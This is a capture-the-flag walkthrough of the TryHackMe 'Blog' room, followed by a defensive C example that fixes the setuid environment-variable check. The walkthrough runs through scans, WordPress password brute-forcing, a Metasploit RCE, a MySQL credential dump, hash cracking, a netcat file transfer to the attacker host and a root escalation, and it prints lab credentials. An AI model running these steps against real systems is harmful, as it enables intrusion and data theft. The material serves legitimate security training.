Blog
Room Link: https://tryhackme.com/room/blog
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

TCP/445 - SMB
Kali
smbclient -L //$VICTIM/

Kali
smbclient //$VICTIM/BillySMB

Kali
smbget -R smb://$VICTIM/BillySMB

Kali
steghide extract -sf check-this.png
cat rabbit_hole.txt

TCP/80 - HTTP
Going to http://$VICTIM/wp-admin redirects to another hostname, so I added blog.thm to my hosts file, after which the page worked.

Kali
wpscan --url http://blog.thm/ --enumerate u

Hydra was taking too long, but wpscan found the password quickly.
Kali
wpscan --url http://blog.thm/ -U kwheel,bjoel -P /usr/share/wordlists/rockyou.txt

After logging in, the user couldn't really do anything, but I noticed WordPress is on version 5.0.

Initial Shell
Kali
msfconsole
use exploit/multi/http/wp_crop_rce
set rhosts $VICTIM
set username kwheel
set password cutiepie1
run
shell
python2 -c 'import pty; pty.spawn("/bin/bash")'
id

Victim
grep -i pass *

Victim
mysql -u wordpressuser -p
Password: LittleYellowLamp90!@
show databases;
use blog;
show tables;
select * from wp_users;

I tried brute forcing the hashes and recovered kwheel's password again, but kwheel isn't a user on the actual server. I wasn't able to crack bjoel's hash.
Kali
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

I found a PDF in bjoel's home directory; it says he was fired, so his account is most likely locked anyway and there may be no point trying to break into it.
Kali(receiving)
nc -l -p 1234 > Billy_Joel_Termination_May20-2020.pdf
Victim(sending)
cd /home/bjoel
nc -w 3 $KALI 1234 < Billy_Joel_Termination_May20-2020.pdf

Privilege Escalation
Victim
find / -perm -u=s -type f 2> /dev/null

This script just checks whether an environment variable named admin is set; if it isn't, it exits.
Victim
cd /usr/sbin
ltrace checker

I set the admin environment variable and got root right away after running the script.
Victim
env
export admin=admin
env
/usr/sbin/checker
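The root cause here is a setuid binary that takes an authorization decision from a caller-controlled environment variable. The following is an added example, not the room's checker source (the vulnerable pattern is reconstructed from the ltrace description above, and all function names are mine): the broken check beside a hardened one that decides from the real uid and treats the inherited environment of a setuid process as hostile.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Pattern inferred from the ltrace output in the writeup (reconstructed here,
 * not the real source of /usr/sbin/checker): a setuid-root helper that grants
 * privilege whenever an environment variable named "admin" exists. The caller
 * owns the environment, so this is not an authorization check at all. */
int vulnerable_is_admin(void)
{
    return getenv("admin") != NULL;
}

/* Same rule glibc's secure_getenv() applies: when real and effective ids differ
 * the process runs setuid/setgid and the inherited environment is hostile,
 * so refuse to hand anything back from it. */
const char *privileged_safe_getenv(const char *name)
{
    if (getuid() != geteuid() || getgid() != getegid())
        return NULL;
    return getenv(name);
}

/* Hardened decision: the kernel-assigned real uid says who invoked us and
 * cannot be forged. Only root passes; if non-root operators legitimately need
 * the helper, decide from their real uid or group list, never from environment. */
int hardened_is_admin(void)
{
    if (getuid() != 0) return 0;
    return privileged_safe_getenv("admin") != NULL; /* root-only optional knob */
}

/* Before any privileged action a setuid helper should also drop the inherited
 * environment wholesale (PATH, LD_*, ...) and install a fixed PATH. 0 on success. */
int scrub_environment(void)
{
    if (clearenv() != 0)
        return -1;
    return setenv("PATH", "/usr/sbin:/usr/bin:/sbin:/bin", 1);
}

int main(void)
{
    setenv("admin", "admin", 1);              /* what "export admin=admin" did */
    printf("vulnerable check grants admin: %d\n", vulnerable_is_admin());
    printf("hardened check grants admin:   %d\n", hardened_is_admin());
    return 0;
}
```

Run as an unprivileged user the vulnerable check prints 1 and the hardened check prints 0; a baseline of expected setuid files (the find command above, recorded on a known-good host) is the matching detection for an unexpected helper like this one.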
